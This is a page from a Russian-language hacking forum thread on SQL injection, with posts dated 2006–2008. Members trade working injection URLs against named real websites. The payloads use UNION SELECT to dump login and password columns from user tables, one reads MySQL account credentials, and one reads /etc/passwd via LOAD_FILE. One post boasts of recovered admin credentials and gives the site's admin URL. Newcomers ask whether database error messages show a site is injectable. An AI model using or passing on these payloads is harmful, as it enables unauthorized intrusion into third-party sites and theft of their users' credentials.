FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 1584 из 1602

1584

Опции темы

Поиск в этой теме

Опции просмотра

05.08.2006, 02:32

atall v.5

Новичок

Регистрация: 09.07.2006

Сообщений: 1

Провел на форуме:
7116

Репутация: 1

epidem.ru

http://epidem.ru/modules.php?name=News&pagenum=\'

Вопрос про sql-injection.

06.01.2008, 20:01

LAEOT

Новичок

Регистрация: 06.01.2008

Сообщений: 15

Провел на форуме:
29345

Репутация: 35

Вопрос про sql-injection.

Вот недавно проверял один сайт и вроде бы нашол sql injection.

Вот 2 примера из сайта:
1. я набрал этот url :
http://www.site.com/script.php?file=2-1'

Получил ответ :

Warning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: Unable to access 2-1 in /home/site.com/script.php on line 3

Warning: imagecreatefromjpeg(2-1) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /home/site.com/script.php on line 3

Warning: imagesx(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 4

Warning: imagesy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 5

Warning: imagecopyresized(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 23

Warning: imagedestroy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 25
-------------------- это первый пример
вопросы от меня:
1. есть ли sql injection?
2. если да,то можете пример дать?
info: што в красном цвете,это текст который я водил в url (2-1')
--------------------
Второй пример:
http://www.site.com/forum.php?id=4686&start=20'
Ответ:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site.com/forum.php on line 439
------------------
вопросы от меня:
1. есть ли sql injection?
2. если да,то можете пример дать?

Зарание спасибо за ответы!

10.07.2008, 16:42

masterBlack

Новичок

Регистрация: 12.06.2008

Сообщений: 19

Провел на форуме:
70897

Репутация: 3

Я новичок! Скажите плиз эт уязвимость?
http://www.ac-psych.org/?id=1'/*
Если да то какое название поля?
Заранее спасибо!

09.10.2006, 21:23

Goudini

Участник форума

Регистрация: 07.06.2006

Сообщений: 146

Провел на форуме:
1652093

Репутация: 490

Отправить сообщение для Goudini с помощью ICQ

Цитата:

Сообщение от _Pantera_

http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14/*

http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,concat(user,% 22:%22,password),10,11,12,13,14+from+mysql.user/*

А вот и рут нашелся

http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14+from+mysql.user/*

Последний раз редактировалось Goudini; 09.10.2006 в 21:30.. Причина: LOAD_FILE('/etc/passwd')

20.12.2006, 22:42

DIAgen

Познавший АНТИЧАТ

Регистрация: 02.05.2006

Сообщений: 1,191

Провел на форуме:
7364332

Репутация: 1276

http://www.cycling.from.kz/theme.php?section=history&full=-2+union+select+1,2,333,4,5,6/*

27.01.2007, 04:08

*D1VER

Участник форума

Регистрация: 05.12.2006

Сообщений: 112

Провел на форуме:
685950

Репутация: 175

Отправить сообщение для *D1VER с помощью ICQ

Цитата:

Сообщение от [53x]Shadow

На islam.ru

http://www.islam.ru/shop/index.php?cat=-1+union+select+0,email,password,0,0+from+users/*

выяснил таблицу и нужные столбцы, но что то с выводом никак, у кого получится стучитесь в личку дальше больше....

http://www.islam.ru/shop/index.php?sample=771&good=98&cat=-1+union+select+1,2,3,4,concat(password,char(58),id ,CHAR(194,206,210,32,194,219,194,206,196,33))+from +users+limit+0,1/*
Без пробелов!

19.02.2007, 19:32

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

Цитата:

Сообщение от [sql]

Код:

http://www.bamba.ru/product.asp?view=1+or+1=(SELECT+TOP+1+cast(email+as+nvarchar)%2B%27%3A%27%2Bcast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+MEMBER+where+member_id=10)--

и че это?

20.02.2007, 00:57

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Отправить сообщение для ice1k с помощью ICQ

Код:

http://www.bulgaria.by/rus/index.php?text_id=-99+union+select+concat(login,0x3a,pwd)+from+user+limit+0,1/*

22.02.2007, 19:06

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

Провел на форуме:
6860213

Репутация: 378

www.Tetis-Pro.ru

Код:

http://www.tetis-pro.ru/?menu_id=&page_id=-1+union+select+1,2,login,pass,5,6,7,8,9+from+users+limit+0,1/*

admin:xxx
http://www.tetis-pro.ru/admin

Код:

http://www.iriscom.ru/index.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

#10

22.02.2007, 19:07

злюка

Постоянный

Регистрация: 11.11.2005

Сообщений: 317

Провел на форуме:
2848854

Репутация: 409

Отправить сообщение для злюка с помощью ICQ

Цитата:

Сообщение от swat

сорь не знал....

это я к тому, что админам пох))

Страница 1584 из 1602

1584

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ